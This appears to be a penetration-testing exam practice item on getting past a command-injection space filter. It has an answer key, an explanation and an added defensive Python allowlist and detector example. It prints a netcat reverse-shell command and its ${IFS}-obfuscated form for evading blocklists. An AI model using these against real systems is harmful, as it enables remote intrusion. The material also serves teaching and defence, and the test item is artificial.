A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability.
The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?
A. ${IFS}
B. %0a
C. +
D. %20
Answer: A
Explanation:
To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}.
${IFS} stands for Internal Field Separator in Unix-like shells; by default it holds the space, tab, and newline characters, which the shell uses to split an expanded command line into words.
Command Injection:
Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.
Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters, such as spaces.
Bypassing Filters:
${IFS}: Using ${IFS} instead of a space can bypass filters that block the literal space character. Because the expansion is unquoted, the shell expands ${IFS} to its whitespace characters and then splits the command line into words at them, so the effect is the same as writing a space.
Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444.
Alternative Encodings:
%0a: Represents a newline character in URL encoding.
+: Sometimes used in place of space in URLs.
%20: URL encoding for space.
However, ${IFS} is most appropriate for shell command contexts.
Pentest Reference:
Command Injection: Understanding how command injection works and common techniques to exploit it.
Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.
Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.
By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability’s exploitability.
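As an added illustration from the defender's side (this code is not part of the original question or explanation; the function names, the allowlist pattern and the sample inputs are this example's own constructions), the following Python shows why a blocklist that only rejects the literal space accepts the ${IFS} rewrite quoted above, what an allowlist check on the argument does instead, and how a log-review or WAF-style detector can canonicalise URL encoding (%20, %0a, +) before looking for shell metacharacters and IFS expansion.

```python
"""Added example (not from the original page): a space blocklist versus an
allowlist, plus a canonicalising detector for command-injection indicators.

The two payload strings are the ones quoted in the question; all other inputs
are constructed for this example, and the function names are this example's own.
"""
import re
from urllib.parse import unquote_plus

# The page's original command and its ${IFS} rewrite.
ORIGINAL = "nc -e /bin/sh 10.10.10.16 4444"
IFS_REWRITE = "nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444"


def naive_space_blocklist(value: str) -> bool:
    """The kind of filter the question describes: reject only a literal space.
    Returns True when the input is accepted (i.e. the filter lets it through)."""
    return " " not in value


# Constructed allowlist: a hostname or IPv4 address may only contain these characters.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def hostname_allowlist(value: str) -> bool:
    """Hardened check: accept only what a host argument may legitimately contain.
    Anything else ('$', '{', '}', ';', whitespace, ...) is rejected outright."""
    return HOSTNAME_RE.fullmatch(value) is not None


# Indicators worth flagging after canonicalisation (constructed patterns).
IFS_RE = re.compile(r"\$\{?IFS\}?")          # $IFS or ${IFS}
META_RE = re.compile(r"[;&|`$(){}<>]")       # common shell metacharacters


def canonicalise(raw: str) -> str:
    """Decode URL encoding the way the target server would, treating '+' as a
    space and repeating until the value is stable so double encoding is undone."""
    current = raw
    for _ in range(3):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def injection_indicators(raw: str) -> list:
    """Return the indicator names found in one request parameter value."""
    decoded = canonicalise(raw)
    found = []
    if IFS_RE.search(decoded):
        found.append("ifs_expansion")
    if META_RE.search(decoded):
        found.append("shell_metacharacter")
    if "\n" in decoded:
        found.append("newline")
    return found


if __name__ == "__main__":
    for sample in (ORIGINAL, IFS_REWRITE, "10.10.10.16", "10.10.10.16%0aid"):
        print(
            f"{sample!r}: blocklist accepts={naive_space_blocklist(sample)}, "
            f"allowlist accepts={hostname_allowlist(sample)}, "
            f"indicators={injection_indicators(sample)}"
        )
```

The blocklist passes the ${IFS} rewrite because it never contains a literal space, while the allowlist rejects it on the first `$`. The detector decodes before matching, so `%0a` is seen as a newline and `%2524` as a double-encoded `$`, which is why canonicalisation has to precede any pattern check.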